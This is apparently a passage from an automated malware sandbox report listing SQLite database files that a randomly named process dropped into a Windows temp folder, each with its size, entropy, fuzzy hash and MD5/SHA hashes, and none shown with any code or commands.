                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\UOKkKoiZfP

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\UT5KGv8mEB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\UUAHbGTIeW

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\UjjPQFoZCG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\UsQ27VVFbV

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\VQULeWp86F

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\VXus5Rj58b

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Vc4By1JuTT

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Vg6xg0G9Tj

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\W2aFmiciFW

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\W3VcKJKk36

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\WAoOgVlr1s

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\WNcq0exwTR

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\WeGhXj3MfH

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\WkjCQ8kRAb

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\X0yFLE4cjq

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\XTHHF7RoVe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\XV5fmx19Ob

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Xb33pIttLT

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Xiov6pB4cg

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
